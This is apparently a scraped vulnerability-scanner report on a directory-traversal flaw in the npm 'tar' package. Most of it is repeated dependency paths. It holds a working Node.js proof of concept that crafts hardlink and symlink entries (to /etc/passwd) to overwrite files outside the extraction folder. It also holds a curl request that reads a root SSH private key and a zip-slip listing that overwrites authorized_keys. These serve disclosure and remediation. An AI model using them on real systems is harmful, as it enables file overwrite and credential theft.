  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
+ +
+ +
+ +

Overview

+

tar is a full-featured Tar for Node.js.

+

Affected versions of this package are vulnerable to Directory Traversal via insufficient sanitization of the linkpath parameter during archive extraction. An attacker can overwrite arbitrary files or create malicious symbolic links by crafting a tar archive with hardlink or symlink entries that resolve outside the intended extraction directory.

+

PoC

+ 
const fs = require('fs')
+        const path = require('path')
+        const tar = require('tar')
+        
+        const out = path.resolve('out_repro')
+        const secret = path.resolve('secret.txt')
+        const tarFile = path.resolve('exploit.tar')
+        const targetSym = '/etc/passwd'
+        
+        // Cleanup & Setup
+        try { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {}
+        fs.mkdirSync(out)
+        fs.writeFileSync(secret, 'ORIGINAL_DATA')
+        
+        // 1. Craft malicious Link header (Hardlink to absolute local file)
+        const h1 = new tar.Header({
+          path: 'exploit_hard',
+          type: 'Link',
+          size: 0,
+          linkpath: secret 
+        })
+        h1.encode()
+        
+        // 2. Craft malicious Symlink header (Symlink to /etc/passwd)
+        const h2 = new tar.Header({
+          path: 'exploit_sym',
+          type: 'SymbolicLink',
+          size: 0,
+          linkpath: targetSym 
+        })
+        h2.encode()
+        
+        // Write binary tar
+        fs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ]))
+        
+        console.log('[*] Extracting malicious tarball...')
+        
+        // 3. Extract with default secure settings
+        tar.x({
+          cwd: out,
+          file: tarFile,
+          preservePaths: false
+        }).then(() => {
+          console.log('[*] Verifying payload...')
+        
+          // Test Hardlink Overwrite
+          try {
+            fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN')
+            
+            if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') {
+              console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')
+            } else {
+              console.log('[-] Hardlink failed')
+            }
+          } catch (e) {}
+        
+          // Test Symlink Poisoning
+          try {
+            if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) {
+              console.log('[+] VULN CONFIRMED: Symlink points to absolute path')
+            } else {
+              console.log('[-] Symlink failed')
+            }
+          } catch (e) {}
+        })
+
+

Details

+

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

+

Directory Traversal vulnerabilities can be generally divided into two types:

+
    +
  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
    • +
+

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

+

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

+ 
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
+
+

Note %2e is the URL encoded version of . (dot).

+
    +
  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.
    • +
+

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

+

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

+ 
2018-04-15 22:04:29 .....           19           19  good.txt
+        2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys
+
+

Remediation

+

Upgrade tar to version 7.5.3 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

Improper Handling of Unicode Encoding

+
+ +
+
+ medium severity +
+
+ Exploit: Proof of Concept +
+
+ +
+ +
    +
  • + Manifest file: node:18-alpine /usr/local/lib/node_modules +
    • +
  • + Package Manager: npm +
    • +
  • + Vulnerable module: + + tar +
    • + +
  • Introduced through: + + + lib@*, npm@10.8.2 and others +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + lib@* + + npm@10.8.2 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmaccess@8.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmhook@10.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmorg@6.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmsearch@7.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmteam@6.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-profile@10.0.0 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
